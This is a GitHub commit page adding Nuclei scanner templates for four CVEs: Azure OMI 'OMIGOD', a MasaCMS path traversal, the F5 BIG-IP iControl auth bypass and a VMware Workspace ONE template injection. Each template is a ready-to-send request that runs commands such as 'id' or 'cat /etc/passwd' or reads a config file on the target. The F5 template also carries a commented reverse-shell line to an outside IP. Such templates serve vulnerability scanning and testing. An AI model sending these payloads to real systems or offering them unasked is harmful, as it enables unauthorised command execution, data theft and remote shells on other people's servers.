Skip to content

Commit 8694ce9

Browse files
committed
add 51pwn 2022-11-03
1 parent ae29aa6 commit 8694ce9

31 files changed

+2014
-0
lines changed

config/51pwn/CVE-2021-38647.yaml

Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
id: CVE-2021-38647_51pwn
2+
3+
info:
4+
name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647
5+
author: 51pwn
6+
severity: Critical
7+
description: |
8+
On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io.
9+
The most critical of them being CVE-2021-38647, now dubbed OMIGOD,
10+
which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below.
11+
reference:
12+
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
13+
14+
tags: RCE,Web
15+
16+
requests:
17+
- raw:
18+
- |
19+
POST /wsman HTTP/1.1
20+
Connection: close
21+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
22+
Host: {{Hostname}}
23+
Content-Type: application/soap+xml;charset=UTF-8
24+
25+
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema">
26+
<s:Header>
27+
<a:To>HTTP://192.168.1.1:5986/wsman/</a:To>
28+
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
29+
<a:ReplyTo>
30+
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
31+
</a:ReplyTo>
32+
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
33+
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
34+
<a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID>
35+
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
36+
<w:Locale xml:lang="en-us" s:mustUnderstand="false" />
37+
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
38+
<w:OptionSet s:mustUnderstand="true" />
39+
<w:SelectorSet>
40+
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
41+
</w:SelectorSet>
42+
</s:Header>
43+
<s:Body>
44+
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
45+
<p:command>id</p:command>
46+
<p:timeout>0</p:timeout>
47+
</p:ExecuteShellCommand_INPUT>
48+
</s:Body>
49+
</s:Envelope>
50+
51+
# end
52+
matchers-condition: and
53+
matchers:
54+
- type: regex
55+
regex:
56+
- <p:StdOut>(.*uid=.*)<\/p:StdOut>
57+

config/51pwn/CVE-2021-42183.yaml

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: CVE-2021-42183_51pwn
2+
info:
3+
name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.
4+
author: 51pwn
5+
severity: critical
6+
reference:
7+
- https://github.com/hktalent/nuclei-templates
8+
- https://51pwn.com
9+
tags: oss
10+
11+
requests:
12+
- raw:
13+
- |+
14+
GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1
15+
Host: {{Hostname}}
16+
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
17+
Pragma:no-cache
18+
unsafe: true
19+
cookie-reuse: true
20+
req-condition: true
21+
22+
matchers-condition: or
23+
matchers:
24+
- type: dsl
25+
dsl:
26+
- "status_code_1 == 200"

config/51pwn/CVE-2022-1388.yaml

Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
id: CVE-2022-1388_51pwn
2+
3+
info:
4+
name: F5 BIG-IP iControl REST Auth Bypass RCE
5+
author: dwisiswant0
6+
severity: critical
7+
description: |
8+
doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml
9+
This vulnerability may allow an unauthenticated attacker
10+
with network access to the BIG-IP system through the management
11+
port and/or self IP addresses to execute arbitrary system commands,
12+
create or delete files, or disable services. There is no data plane
13+
exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' "
14+
reference:
15+
- https://twitter.com/GossiTheDog/status/1523566937414193153
16+
- https://support.f5.com/csp/article/K23605346
17+
classification:
18+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
19+
cvss-score: 9.80
20+
cve-id: CVE-2022-1388
21+
cwe-id: CWE-306
22+
metadata:
23+
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
24+
verified: true
25+
tags: bigip,cve,cve2022,rce,mirai
26+
27+
variables:
28+
auth: "admin:"
29+
30+
requests:
31+
- raw:
32+
- |
33+
POST /mgmt/tm/util/bash HTTP/1.1
34+
Host: {{Hostname}}
35+
Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host
36+
X-F5-Auth-Token: a
37+
Authorization: Basic {{base64(auth)}}
38+
Content-Type: application/json
39+
40+
{
41+
"command": "run",
42+
"utilCmdArgs": "-c id"
43+
}
44+
matchers-condition: and
45+
matchers:
46+
- type: regex
47+
regex:
48+
- "(commandResult)"
49+
- "(uid=\\d+\\(.*)"
50+
- type: status
51+
status:
52+
- 200
53+
condition: and
54+
extractors:
55+
- type: regex
56+
part: body
57+
regex:
58+
- "(uid=\\d+\\([^\\n]{3,})"

config/51pwn/CVE-2022-22954.yaml

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
id: CVE-2022-22954_51pwn
2+
3+
info:
4+
name: VMware Workspace ONE Access - Server-Side Template Injection
5+
author: 51pwn
6+
severity: critical
7+
description: |
8+
VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
9+
reference:
10+
- https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
11+
- https://www.vmware.com/security/advisories/VMSA-2022-0011.html
12+
- http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2022-22954
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16+
cvss-score: 9.8
17+
cve-id: CVE-2022-22954
18+
cwe-id: CWE-94
19+
metadata:
20+
shodan-query: http.favicon.hash:-1250474341
21+
tags: cve,cve2022,vmware,ssti,workspaceone,cisa
22+
23+
requests:
24+
- method: GET
25+
path:
26+
# - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd
27+
- "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd
28+
29+
matchers-condition: and
30+
matchers:
31+
- type: word
32+
part: body
33+
words:
34+
- "root:*:0:0:"
35+
36+
37+
# Enhanced by mp on 2022/07/06

0 commit comments

Comments
 (0)